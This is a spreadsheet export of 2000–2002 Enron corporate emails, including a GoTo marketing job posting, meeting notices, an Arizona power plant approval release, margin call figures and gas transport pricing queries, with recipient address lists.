GoTo in Pasadena, CA is searching for a Marketing Manager in_x000D_
Acquisitions to help acquire new online advertisers. _x000D_
Interested candidates should contact Janet Traynor at _x000D_
janet.traynor@goto.com with a cover letter and resume._x000D_
_x000D_
Thank you,_x000D_
Lorie_x000D_
_x000D_
_x000D_
_x000D_
---------------------------------_x000D_
GoTo is a world-class organization that has the people and _x000D_
infrastructure to become one of the most important Internet_x000D_
companies in the world. Over the past three years, GoTo has_x000D_
created a scalable, hard-to-replicate business that _x000D_
provides high quality, relevant search results to tens of _x000D_
thousands of Web site and portal partners. In fact, recent _x000D_
alliances with America Online (AOL), Terra Lycos and _x000D_
AltaVista have extended its reach to approximately 75 _x000D_
percent of the U.S. Internet population.  Our headquarters _x000D_
are located in Pasadena, CA and we can be found online at _x000D_
www.goto.com.  _x000D_
_x000D_
Manager, Advertiser Marketing (Acquisitions)_x000D_
_x000D_
Location:  Pasadena, CA_x000D_
	_x000D_
Job Description: _x000D_
The Marketing Manager will create and execute initiatives _x000D_
to acquire new online advertisers. He/she will initiate and_x000D_
lead acquisition programs to increase awareness, interest _x000D_
and, ultimately, sign-up.  He/she will lead _x000D_
cross-functional teams to achieve the Advertiser program _x000D_
objectives and will represent the marketing point of view _x000D_
in various cross-functional team and product development _x000D_
forums related to Acquisition program. _x000D_
_x000D_
Responsibilities:_x000D_
? Work with Marketing Director to develop and execute the _x000D_
marketing strategy for the Advertiser Acquisition program._x000D_
? Develop, execute and analyze new programs to increase _x000D_
prospect awareness, interest and sign-up.  These programs _x000D_
may include:_x000D_
? Direct mail programs_x000D_
? Online advertising programs (such as emails, banners, _x000D_
text links, etc.)_x000D_
? Content developed for the Web site_x000D_
? Event sponsorship and attendance_x000D_
? Develop and execute new programs to increase advertiser _x000D_
sign-up._x000D_
? Analyze and segment GoTo's target prospects.  Apply this _x000D_
learning to make actionable recommendations. _x000D_
? Develop monthly competitive activity reporting and serve _x000D_
as central point for all acquisition related competitive _x000D_
intelligence._x000D_
? Manage components of the market research plan. _x000D_
? Develop and manage the marketing budget._x000D_
_x000D_
_x000D_
_x000D_
Skills/Qualifications:_x000D_
? A strategic and insightful understanding of marketing _x000D_
strategy. _x000D_
? Proven track record of professional success and _x000D_
leadership accomplishment, marketing experience required. _x000D_
? Experience in setting business objectives and developing _x000D_
corresponding business plans. _x000D_
? Experience in leading and working with cross-functional _x000D_
teams. _x000D_
? Experience in online and offline acquisition strategies _x000D_
and tactics._x000D_
? Experience managing detailed departmental budgets._x000D_
? Experience in business-to-business marketing._x000D_
? Familiarity with market research techniques and how to _x000D_
apply them to business opportunities. _x000D_
? Strong direct marketing skills._x000D_
? Experience segmenting customer/prospect groups._x000D_
? Strong analytical skills and strong detail orientation. _x000D_
? Strong written and verbal communication skills. _x000D_
? Fun loving.  Enjoys working with teams. _x000D_
? Able to handle multiple priorities simultaneously in a _x000D_
fast-paced environment. _x000D_
? Relationship marketing experience, a plus._x000D_
_x000D_
_x000D_
We offer an excellent benefits package that starts your _x000D_
first day on the job.  This includes: a 401K Plan, Medical _x000D_
(HMO &amp; PPO), Dental &amp; Vision benefits, paid vacation, sick _x000D_
days, Short &amp; Long Term Disability Insurance, Life _x000D_
Insurance, Flexible Spending Account, Employee Assistance _x000D_
Program, Stock Option Plan and Employee Stock Purchase _x000D_
Plan.  Employees enjoy a casual dress and fun team _x000D_
environment. _x000D_
_x000D_
Please forward your resume to janet.traynor@goto.com.  _x000D_
_x000D_
Also, feel free to apply online @ www.GoTo.com_x000D_
_x000D_
__________________________________________________x000D_
MBA Career Management Center_x000D_
The Anderson School at UCLA_x000D_
Entrepreneurs Hall, C201_x000D_
Phone: (310) 825-3325_x000D_
Email: career.management.center@anderson.ucla.edu_x000D_
Web: http://www.anderson.ucla.edu</t>
  </si>
  <si>
    <t>Fri, 16 Feb 2001 08:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'buzzboys@mindspring.com'})</t>
  </si>
  <si>
    <t>frozenset({'winnhg@pol.net', 'lloydb@onramp.net', 'suzanna.schulze@wcom.com', 'jcameron@transtechmanagement.com', 'swgregory@shellus.com', 'amycan2@hotmail.com', 'aweaver@bayou.uh.edu', 'trb@ux7.sp.cs.cmu.edu', 'antsngdj@hotmail.com', 'morgan@wxs.nl', 'hdjaustin@aol.com', 'rodneyh@aes.tamu.edu', 'sherilyn@jump.net', 'lbenet@satx.rr.com', 'jfharris@gateway.net', 'crecord@myriad.net', 'weaverwoodworks@cs.com', 'sbdot@juno.com', '4walkers@vvm.com', 'lbbinford@aol.com', 'orttm@marietta.edu', 'bnunley@peppersnet.com', 'invoice.inquiry@mindspring.com', 'wgregory@hcad.org', 'marie.dunn@pdq.net', 'carl.reynolds@tdcj.state.tx.us', 'beeweaver@tca.net', 'w-rubink@pop.tamu.edu', 'jeanyokoyama@cs.com', 'marroquin@harrison-hurd.com', 'powerds@aol.com', 'edenh@mindspring.com', 'pteel@tamu.edu', 'leejoffe@yahoo.com', 'kelleycg@interxcable.net.mx', 'love2btender@aol.com', 'monique.sanchez@enron.com', 'mweaver@txcyber.com', 'bill.harte@usa.xerox.com', 'lanny@airmail.net', 'ed.gregory@sait.ab.ca', 'bobm@kdi.com', 'renee@levyandwurz.com', 'r-coulson@tamu.edu', 'emharris@dow.com', 'glock78503@aol.com', 'photomail@filmworks.com', 'thegregorys@mindspring.com', 'niftyhen@yahoo.com', 'jim@pciut.com', 'jdunlap@lcc.net', 'c-coates@tamu.edu', 'cdgray@iwc.net', 'dcfowler@prodigy.net', 'sterling@techheadnet.com', 'gusto@aloha.net', 'wtpfluge@juno.com', 'bobngg@webtv.net', 'bschumachermd@yahoo.com', 'mikeykm@hotmail.com', 'bcr345@aol.com', 'jfgregory@pbsj.com', 'dmw@txcyber.com', 'hollen3000@hotmail.com', 'marcimeghan@hotmail.com', 'chrisey@ccsalpha3.nrl.navy.mil', 'tds@sagomail.tamu.edu', 'scampbel@eanes.k12.tx.us', 'modisett-wilson@prodigy.net', 'lisav@airmail.net', 'gmloper@juno.com', 'sri@gvtc.com', 'georges@pobox.com', 'beebuzzboys@aol.com', 'peaceandlove@msn.com', 'sam.francis@jicompanies.com', 'jancheri@aol.com', 'dholtkamp@sagomail.tamu.edu'})</t>
  </si>
  <si>
    <t>PLEASE NOTE THE NEW EMAIL ADDRESS FOR DANNY AND LAURA WEAVER:_x000D_
BEEBUZZBOYS@AOL.COM_x000D_
_x000D_
THANK YOU AND WE LOOK FORWARD TO HEARING FROM YOU!</t>
  </si>
  <si>
    <t>Tue, 16 Jan 2001 04:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Causey Presentation</t>
  </si>
  <si>
    <t xml:space="preserve">I have reviewed my section of Causey's presentation ( to be given by Brenda) _x000D_
and all looks fine except for page with world map.  Can we add Portland to _x000D_
the map?  That is the true trading location that is missing.  If it is tough _x000D_
to do, don't worry about it.  Thanks.  --Sally </t>
  </si>
  <si>
    <t>Wed, 18 Apr 2001 15:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Professional Administrative Assistants Week</t>
  </si>
  <si>
    <t>ok</t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 01:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>GIR PD</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
---------------------- Forwarded by Susan Scott/ET&amp;S/Enron on 11/30/2000 _x000D_
09:43 AM ---------------------------_x000D_
_x000D_
_x000D_
"Angeles, Zenee G. - TPZGA" &lt;ZAngeles@sempra.com&gt; on 11/29/2000 04:34:14 PM_x000D_
To: "Alexander, Michael@sce" &lt;alexanms@sce.com&gt;, "Amirault, Paul@AEC" _x000D_
&lt;paulamirault@aec.ca&gt;, "Bayless, David@Utility" &lt;david.bayless@utility.com&gt;, _x000D_
"Beach, Thomas@Crossborder" &lt;tomb@crossborderenergy.com&gt;, "Burkholder, _x000D_
John@cts/whb" &lt;burkee@cts.com&gt;, "Chancellor, Craig@Calpine" _x000D_
&lt;craigc@calpine.com&gt;, "Counihan, Rick@Green Mountain" _x000D_
&lt;rick.counihan@greenmountain.com&gt;, "Dasovich, Jeff@Enron" _x000D_
&lt;jdasovic@enron.com&gt;, "Day, Michael@GMSSR" &lt;mday@gmssr.com&gt;, "Dingwall, _x000D_
Brian@UEM" &lt;bdingwall@unitedgas.com&gt;, "Elsesser, Evelyn@aelaw" _x000D_
&lt;eke@aelaw.com&gt;, "Johnson, Pamela@REMAC" &lt;johnson_pamela@lacoe.edu&gt;, "Jun, _x000D_
Christine@aelaw" &lt;chj@aelaw.com&gt;, "Karp, Joseph@Whitecase" _x000D_
&lt;karpjos@sf.whitecase.com&gt;, "Keeler, Paul@BR" &lt;pkeeler@br-inc.com&gt;, "Leslie, _x000D_
John@Luce" &lt;jleslie@luce.com&gt;, "McCrea, Keith@CIG/CM" &lt;kmccrea@sablaw.com&gt;, _x000D_
"Paul, Joe@Dynegy" &lt;6266273191@messaging.sprintpcs.com&gt;, "Pocta, Mark@ORA" _x000D_
&lt;rmp@cpuc.ca.gov&gt;, "Porter, Doug@SCE" &lt;porterdk@sce.com&gt;, "Rochman, _x000D_
Michael@CUB" &lt;rochmanm@cubjpa.org&gt;, "Rochman, Michael@SPURR" _x000D_
&lt;rochmanm@spurr.org&gt;, "Scott, Susan@TW" &lt;sscott3@enron.com&gt;, "Worster, _x000D_
Gerard@TXU" &lt;gworster@txuenergy.com&gt;, "Zaiontz, Jean@BP" &lt;zaiontj@bp.com&gt;_x000D_
cc: "Suwara, J.- TPJUS" &lt;JSuwara@sempra.com&gt;, "Wright, Gillian - TP1GXW" _x000D_
&lt;GWright@sempra.com&gt;, "Sullivan, Glen J." &lt;GSullivan@sempra.com&gt; _x000D_
_x000D_
Subject: GIR PD_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
The GIR meeting to discuss the proposed decision issued on November 21 is _x000D_
scheduled for Monday, December 4, in Room 2A of The Gas Company Tower at 555 _x000D_
West Fifth Street, in Los Angeles._x000D_
_x000D_
The following is the Conference Line information for those who are unable to _x000D_
attend in person: _x000D_
_x000D_
??????? Dial In No. 1-877-676-6548 _x000D_
??????? Confirmation code 4455426 (please follow prompts) _x000D_
_x000D_
Parking validations at the GCT building will be available and lunch is _x000D_
provided. _x000D_
_x000D_
To assist us in planning, please RSVP to Zenee Angeles via e-mail _x000D_
(zangeles@sempra.com) or via phone (213/244-3831) on your attendance._x000D_
_x000D_
Thank you. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Feb 2001 02:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'pmohler@hewm.com'})</t>
  </si>
  <si>
    <t>frozenset({'deb@aelaw.com', 'gdahlke@painehamblen.com', 'mary.hain@enron.com', 'cfi1@tca-us.com', 'shellyr@teleport.com'})</t>
  </si>
  <si>
    <t>ADR Provision for RTO West Tariff</t>
  </si>
  <si>
    <t>As agreed at last week's tariff integration group meeting, I will be_x000D_
collecting and organizing the revisions/options we discussed for the RTO_x000D_
West Tariff ADR provision.  I owe the compiled results to Sarah by Friday,_x000D_
March 2, so would appreciate getting whatever you can provide to me by_x000D_
Thursday, March 1, at the latest._x000D_
_x000D_
The assignments as I recorded them are:_x000D_
_x000D_
Carl:  Fast-track option_x000D_
Don:  Parties can agree to take all, or part, of dispute to FERC_x000D_
Gary:  Default: baseball or not?_x000D_
Mary:  Applicability to unaccepted service agreements._x000D_
Paul:  Preliminary required mediation?_x000D_
Paul w/ Shelly:  Source(s) for mediators/arbitrators._x000D_
_x000D_
Attached for your convenience are the fast-track intereconnection and_x000D_
regular ADR provisions from the TOA._x000D_
_x000D_
  &lt;&lt;Dispute Resolution.doc&gt;&gt;_x000D_
Thanks, Paul_x000D_
_x000D_
&gt; Paul B. Mohler_x000D_
&gt; Attorney_x000D_
&gt; HellerEhrman_x000D_
&gt; 815 Connecticut Ave, NW, Suite 200_x000D_
&gt; Washington, DC  20006-4004_x000D_
&gt; Direct (202) 263-8953  Fax (202) 785-8877_x000D_
&gt; E-mail: pmohler@hewm.com_x000D_
&gt;_x000D_
The information contained in this e-mail message  may be privileged,_x000D_
confidential and protected from disclosure.  If you are not the intended_x000D_
recipient, any dissemination, distribution or copying is strictly_x000D_
prohibited.  If you think that you have received this e-mail message in_x000D_
error,  please e-mail the sender at "pmohler@hewm.com'._x000D_
_x000D_
_x000D_
_x000D_
 - Dispute Resolution.doc</t>
  </si>
  <si>
    <t>Mon, 9 Oct 2000 04:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Hmmmmm........</t>
  </si>
  <si>
    <t xml:space="preserve">Yea, I'm picking up 2 tix today....hopefully._x000D_
John_x000D_
_x000D_
_x000D_
_x000D_
Jennifer Burns_x000D_
_x000D_
10/09/2000 10:38 AM_x000D_
_x000D_
To: John Arnold/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Hmmmmm........_x000D_
_x000D_
J. Arnold-_x000D_
_x000D_
Hey - It's me!  Any luck with the tickets?????  Just curious if there any way _x000D_
I can get four tickets instead of two?  I know I'm asking alot but I really _x000D_
appreciate it.  You know how much I love the Counting Crows and last time _x000D_
they were in town someone was going to take me but the plans fell _x000D_
through..........Thanks!!!!!!!_x000D_
_x000D_
Jennifer _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Mar 2002 08:28:02 -0800 (PST)</t>
  </si>
  <si>
    <t>ACC approval</t>
  </si>
  <si>
    <t xml:space="preserve">FYI--Didn't know if you were tracking this plant, but thought you find the =_x000D_
ACC decision of interest.  gh_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
COMMISSION APPROVES BOWIE POWER PROJECT  Requires Use of Solor Technology &amp;=_x000D_
 Groundwater Monitoring Program=09_x000D_
PHOENIX - In a decision yesterday, the Arizona Corporation Commission appro=_x000D_
ved the Bowie Power Station proposed for eastern Cochise County in southeas=_x000D_
tern Arizona. The project, to be constructed in two 500-megawatt phases, is=_x000D_
 a water-cooled power plant using a maximum of 6,000 acre-feet of groundwat=_x000D_
er per year when both units are operating continuously at full output. Sout=_x000D_
hWestern Power Group II is the project developer. The approval requires Sou=_x000D_
thWestern to install solar technology when they begin building the second p=_x000D_
ower block. This is the first merchant power plant that is required to inco=_x000D_
rporate solar technology as a core part of the total project. Merchant powe=_x000D_
r plants supply power to the wholesale market as opposed to power plants bu=_x000D_
ilt by a utility with the primary objective of serving its own customers. D=_x000D_
uring Tuesday's meeting, the Commission accepted the 22 restrictions placed=_x000D_
 on the project by the Arizona Power Plant and Transmission Line Siting Com=_x000D_
mittee. After hearing from several representatives of the Bowie and Willcox=_x000D_
 communities, the Commissioners approved an amendment offered by Commission=_x000D_
er Spitzer. The Spitzer amendment specifically addresses concerns by nearby=_x000D_
 pistachio farmers that groundwater pumping could affect the surrounding wa=_x000D_
ter table. Summary of the Spitzer Amendment: The amendment requires SouthWe=_x000D_
stern Power Group II to establish and pay for a groundwater monitoring prog=_x000D_
ram that meets Arizona Department of Water Resources criteria. Once the pro=_x000D_
ject is operating, the SouthWestern will have to establish and make annual =_x000D_
contributions of $100,000 to a Groundwater Impact Mitigation Fund until the=_x000D_
 fund reaches a balance of $500,000. Any business or individual who can pro=_x000D_
ve, through successful arbitration, that groundwater pumping has caused pro=_x000D_
perty or economic damage will be able to submit a claim for reimbursement. =_x000D_
SouthWestern will be required to maintain a total balance of $500,000 in th=_x000D_
e fund. Status reports on the program are to be filed with the Town of Bowi=_x000D_
e, the Pistachio Pass Irrigation District and the Cochise County Board of S=_x000D_
upervisors. The Groundwater Impact Mitigation Fund must be maintained for t=_x000D_
hree years after the plant ceases operation and is decommissioned. Commissi=_x000D_
oner Marc Spitzer said the amendment was prudent considering that the lasti=_x000D_
ng impact of the power project. "I proposed this amendment to answer the co=_x000D_
ncerns of the pistachio farmers and the irrigation district," Commissioner =_x000D_
Marc Spitzer said. "Although we heard testimony that the power plant's grou=_x000D_
ndwater needs would be less than if the land were farmed, I don't think you=_x000D_
 can be too careful. We're making decisions that could affect an economical=_x000D_
ly depressed area for generations to come." Other Environmental Conditions:=_x000D_
 Twenty-two conditions were imposed by the Arizona Power Plant and Transmis=_x000D_
sion Line Siting Committee. They include: ? Establishment of a monitoring p=_x000D_
roject and mitigation fund for ground subsidence and earth fissure monitori=_x000D_
ng. Subsidence is a potential side effect of groundwater pumping. Cracks, f=_x000D_
issures or dips can form in the surface of the earth because the water deep=_x000D_
 underground that provided physical support is no longer there. ? Contribut=_x000D_
ions to the Bowie Fire District to enable it to acquire an additional emerg=_x000D_
ency services vehicle as well as funding of emergency response and hazardou=_x000D_
s materials training for firefighters. ? Making arrangements with local law=_x000D_
 enforcement and the Cochise County Sheriff because the project will involv=_x000D_
e an increase in traffic and may result in the need for emergency responses=_x000D_
 by local law enforcement. This was an amendment sponsored by Commissioner =_x000D_
Jim Irvin. ? Prior to construction of the facility, SouthWestern must provi=_x000D_
de the Commission with a technical study showing that sufficient transmissi=_x000D_
on capacity exists to accommodate the output of the plant and the effect of=_x000D_
 its output on reliable operation of the electric grid. ? Conditions requir=_x000D_
ing compliance with air and water quality standards imposed by the Arizona =_x000D_
Department of Environmental Quality and the Arizona Department of Water Res=_x000D_
ources. Additionally, the applicant will have to participate in and comply =_x000D_
with all standards for safe, reliable power delivery. "I was pleased to sup=_x000D_
port this project, in part because it includes solar technology as a key co=_x000D_
mponent of the whole project. The level of support from the local community=_x000D_
 was also impressive. Les Thompson, Chairman of the Cochise County Board of=_x000D_
 Supervisors indicated that Bowie has one of the highest tax rates of any A=_x000D_
rizona community," Chairman Bill Mundell explained. "The residents and busi=_x000D_
ness people were very excited about the tax and economic development benefi=_x000D_
ts of having the power plant in their community. Additionally, the project =_x000D_
will bring several hundred construction jobs to Bowie and Willcox and, ulti=_x000D_
mately, the 30 or 40 people needed to run the plant." Commissioner Irvin vo=_x000D_
ted in favor of the project, saying: "I do believe the need for this projec=_x000D_
t was established in the record. Further, I believe the project is in the p=_x000D_
ublic interest and meets the balancing test." He was referring to the sitin=_x000D_
g statute that requires the Commission "to balance, in the broad public int=_x000D_
erest, the need for an adequate, economical and reliable supply of electric=_x000D_
 power with the desire to minimize the effect thereof on the environment an=_x000D_
d ecology of this state." (Arizona Revised Statutes ? 40-360.07, subsection=_x000D_
 B.) For more information about recent power plant sitings, visit the Arizo=_x000D_
na Corporation Commission's website at &lt;http://www.cc.state.az.us/news/inde=_x000D_
x.htm&gt;. =09_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
</t>
  </si>
  <si>
    <t>Fri, 9 Nov 2001 08:35:09 -0800 (PST)</t>
  </si>
  <si>
    <t>overdue margin</t>
  </si>
  <si>
    <t xml:space="preserve">there are 3 (AEP,HETCO, and Phibro).  The first number is the amount originally called for, and the second is what the call should be today based on last night's marks.  I have also attached a spreadsheet with the same data._x000D_
_x000D_
All numbers in millions:_x000D_
_x000D_
AEP 		19.25	22.5_x000D_
Phibro		16	16_x000D_
HETCO		17.25	9.5_x000D_
_x000D_
Thanks,_x000D_
Tanya_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Fri, 21 Dec 2001 15:33:39 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'alex.huang@enron.com', 'zimin.lu@enron.com', 'pinnamaneni.krishnarao@enron.com', 'j.kaminski@enron.com'})</t>
  </si>
  <si>
    <t>work &amp; code</t>
  </si>
  <si>
    <t xml:space="preserve">Hi all,_x000D_
_x000D_
I put my works with Enron Research in O:\Research\Common\from_chonawee  (total of 1GB!)_x000D_
They are classified and labeled by customers and projects' names. _x000D_
At any rate, if you guys need me to explain/teach on using these works, please don't hesitate to contact me. I will be more than happy to do that. _x000D_
Best,_x000D_
-Chonawee _x000D_
_x000D_
7100 Almeda Rd. #1022_x000D_
Houston, TX 77054_x000D_
713-320-5473 (cell) 713-796-1437 (home)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 3 Apr 2001 05:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Samantha</t>
  </si>
  <si>
    <t>Mark, I forgot to tell you that I made it out to see Sam last night and to _x000D_
give her the contributions.  She was speechless as were the rest of her _x000D_
family members there.  She said it gave her a lot of strength to know that so _x000D_
many people care.  Sam lost a ton of weight but she is starting to eat _x000D_
again.  _x000D_
_x000D_
I was talking to Tana today and Tana made a great suggestion that we get _x000D_
together a small group to take her to lunch one day a few weeks before she _x000D_
comes back to work.   Tana reminded me of a statement Sam made about _x000D_
preferring to meet in small groups first rather than being overwhelmed by _x000D_
lots of people.  So I think she might like meeting in a small group of folks _x000D_
from work so that when she comes back its not the first time she sees _x000D_
everyone.  _x000D_
_x000D_
Cheryl Nelson_x000D_
Senior Counsel_x000D_
EB3816_x000D_
(713) 345-4693</t>
  </si>
  <si>
    <t>Sun, 6 Jan 2002 01:37:06 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/5/02; HourAhead hour: 24;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/5/02; HourAhead hour: 24;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002010524.txt</t>
  </si>
  <si>
    <t>Fri, 16 Nov 2001 11:25:28 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ron.matthews@enron.com', 'perry.frazier@enron.com', 'jan.moore@enron.com', 'robert.kilmer@enron.com', 'james.centilli@enron.com', 'ben.asante@enron.com', "paul.y'barbo@enron.com", 'stephen.veatch@enron.com', 'tk.lohman@enron.com', 'audrey.robertson@enron.com', 'jerry.graves@enron.com', 'dan.pribble@enron.com', 'tracy.geaccone@enron.com', 'teb.lokey@enron.com', 'dennis.alters@enron.com', 'shelley.corman@enron.com', 'bob.burleson@enron.com', 'glen.hass@enron.com', 'steven.harris@enron.com', 'kimberly.watson@enron.com', 'morgan.gottsponer@enron.com', 'terry.kowalke@enron.com', 'lynn.blair@enron.com', 'lorraine.lindberg@enron.com', 'r..keller@enron.com', 'pallavi.goradia@enron.com', 'tony.pryor@enron.com', 'ramona.betancourt@enron.com', 'michelle.lokay@enron.com', 'eric.faucheaux@enron.com', 'lindy.donoho@enron.com', 'darrell.schoolcraft@enron.com', 'mark.mcconnell@enron.com', 'jeanette.doll@enron.com'})</t>
  </si>
  <si>
    <t>Steve Harris' Staff Meeting on December 3rd</t>
  </si>
  <si>
    <t>_x000D_
Please be informed, due to time constraints, Steve Harris' Staff meeting on December 3rd will be condensed by 30 minutes _x000D_
(2:30-3:00p).  All reports should be abbreviated to accommodate Steve's appointments._x000D_
_x000D_
Please mark your calendars accordingly._x000D_
_x000D_
adr_x000D_
_x000D_
Audrey D. Robertson_x000D_
Transwestern Pipeline Company _x000D_
email address:  audrey.robertson@enron.com_x000D_
(713) 853-5849_x000D_
(713) 646-2551 Fax</t>
  </si>
  <si>
    <t>Tue, 26 Sep 2000 06:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'eldon@interx.net'})</t>
  </si>
  <si>
    <t>RE: And the winners are...</t>
  </si>
  <si>
    <t>it's in the driveway.  the big stack of planks that were stained and then _x000D_
stacked back in the driveway.  in addition, there's the other wood (stacked _x000D_
with the planks) for the stairs, etc.</t>
  </si>
  <si>
    <t>Fri, 1 Feb 2002 13:47:18 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Marketing Issues</t>
  </si>
  <si>
    <t>Where are we with www.enrononline.com?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Forster, David  _x000D_
Sent:	Tuesday, January 29, 2002 6:26 PM_x000D_
To:	Kitchen, Louise_x000D_
Subject:	Marketing Issues_x000D_
_x000D_
Louise,_x000D_
_x000D_
1) I just received a call from Pat O'Donnell asking us to hold off on marketing to the Top 50 customers until he is able to address an email he just received from UBS corporate marketing folks, instructing us not to use the url: www.ubswenergy.com. It seems they want us to use www.ubswarburg.com/energy. Pat is going to argue on behalf of ubswenergy.com tomorrow. He anticipates having resolution by noon. I personally don't care much what URL we use: the brand name and achieving concensus to get this off the ground is more important. Of course, a change in URL now means we have to go back through the site and change all the references again. . ._x000D_
_x000D_
2) UBS (in the form of Matt Meinel, who feels Mike Hutchins will be in agreement with him) do not want us to redirect traffic from www.enrononline.com to the new site, as they feel that promotes too much of an association with Enron. I disagree with their position, but don't think this is too big a deal - we will just need to more heavily promote the new website name. Also, the execution version of the contract apparantly dropped the redirect requirement._x000D_
_x000D_
Please let me know if you have any issues with the above and how you want to proceed. We are ready to put the Splash page out and start marketing as of noon tomorrow, but these 11th hour changes are making me feel skittish about pulling the trigger and I feel a real lack of comfort about our ability to market a system with no name._x000D_
_x000D_
Dave</t>
  </si>
  <si>
    <t>Tue, 29 Aug 2000 06:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Correct Counterparty</t>
  </si>
  <si>
    <t>You're not going to believe this.  I talked to Amoco and they confirmed that _x000D_
I did the deal with them but they said thawe should just pay Agave Energy _x000D_
because tit's a complicated internal deal.  So we are both right..  I only _x000D_
wished Amoco would have told me ahead of time.  Bottom line- pay Agave Energy _x000D_
and not Amoco</t>
  </si>
  <si>
    <t>Wed, 7 Mar 2001 04:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Tenaska IV Transport 10/00</t>
  </si>
  <si>
    <t xml:space="preserve">Megan, _x000D_
_x000D_
I have changed the pricing on deals 452491 and 452475 for October flows to _x000D_
mtr 25000200.  These flows should be priced at $.10 + 1/2 % fuel.  The $.11 _x000D_
that Lone Star billed us is incorrect on the last deal.  I'm not sure about _x000D_
the rates for mtr 20014903.  The person who can tell us should be in _x000D_
tomorrow.  I will leave a note for her.  We should have similar deal tickets _x000D_
for Dec forward.  I will check with Mark and Trisha._x000D_
_x000D_
D_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Megan Parker @ ENRON                           02/26/2001 12:51 PM_x000D_
	_x000D_
_x000D_
To: Daren J Farmer/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Tenaska IV Transport 10/00_x000D_
_x000D_
Have you been able to work out these transport pricing differences for Oct. _x000D_
2000?  We have only been able to pay $4,000.00 of the $28,000.00 invoice.  _x000D_
The pricing for Nov. 2000 (deal 452491) has problems too.  We have $0.01 for _x000D_
11/3 at meter 20014804 and TXU is billing us $0.10 at meter 25000200 and _x000D_
$0.02 at meter 20014903 for the entire month._x000D_
_x000D_
I have also noticed that we are not accruing any transport for Dec 2000 _x000D_
forward.  We have received the Dec. 2000 invoice from TXU, but we do not have _x000D_
a deal to pay them.  We should be getting Jan. 2001 next week.  Is there a _x000D_
deal for these months?  _x000D_
_x000D_
Megan_x000D_
---------------------- Forwarded by Megan Parker/Corp/Enron on 02/26/2001 _x000D_
12:28 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Megan Parker                           01/05/2001 04:12 PM_x000D_
	_x000D_
_x000D_
To: Daren J Farmer/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Tenaska IV Transport 10/00_x000D_
_x000D_
I took a look at the transport for TXU Lone Star for Tenaska IV for 10/00.  _x000D_
We mostly have price differences, but one deal needs some days added.  Let me _x000D_
know if you need copies of the invoices.  The meters below are delivery _x000D_
meters.  I wasn't sure what the receipt meters would be._x000D_
_x000D_
Deal 452491, Meter 20014903  Need to add days 24-26 and 28-31 _x000D_
     Need to check rate - We show $0.01 and we were billed $0.02_x000D_
_x000D_
Deal 452491, Meter 25000200  Need to check rate - We show $0.02 and we were _x000D_
billed $0.10_x000D_
_x000D_
Deal 452475, Meter 25000200  Need to check rate - We show prices from $0.005 _x000D_
to $0.02_x000D_
      and we were billed $0.11_x000D_
_x000D_
Thanks,_x000D_
Megan_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Mar 2001 00:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: 535799</t>
  </si>
  <si>
    <t>Thu, 10 Aug 2000 03:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Iroquois Gas</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for pointing this out.  To my knowledge we have never even tried to _x000D_
overlap the contract or do any segmenting.  _x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Victor Lamadrid                           08/10/2000 08:58 AM_x000D_
	_x000D_
_x000D_
To: Chris Germany/HOU/ECT@ECT, Scott Goodell/Corp/Enron@ENRON, Dan _x000D_
Junek/HOU/ECT@ECT, Scott Hendrickson/HOU/ECT@ECT, Robin Barbe/HOU/ECT@ECT, _x000D_
Kate Fraser/HOU/ECT@ECT, Farzad Farhangnia/HOU/ECT@ECT, Dick _x000D_
Jenkins/HOU/ECT@ECT, John Hodge/Corp/Enron@ENRON, Judy Townsend/HOU/ECT@ECT, _x000D_
Scott Neal/HOU/ECT@ECT, Angie Zeman/Corp/Enron@ENRON_x000D_
cc: Robert Superty/HOU/ECT@ECT, Rebecca W Cantrell/HOU/ECT@ECT _x000D_
Subject: Iroquois Gas_x000D_
_x000D_
Any concerns to forward to Becky Cantrell by Friday the 11th of Aug.???? We _x000D_
currently only have a 2017 dkt/d term contract #125005, a 35,465 dkt/d term _x000D_
contract #125008, an IT contract and a parking and loaning contract to handle _x000D_
our Canadian term supply.  We typically transport to markets off Iroquois, to _x000D_
Tennnessee pipeline and CNG pipeline.  That is a simplified summary of our _x000D_
daily activity on Iroquois.  If you need any information, please let me _x000D_
know.  _x000D_
---------------------- Forwarded by Victor Lamadrid/HOU/ECT on 08/10/2000 _x000D_
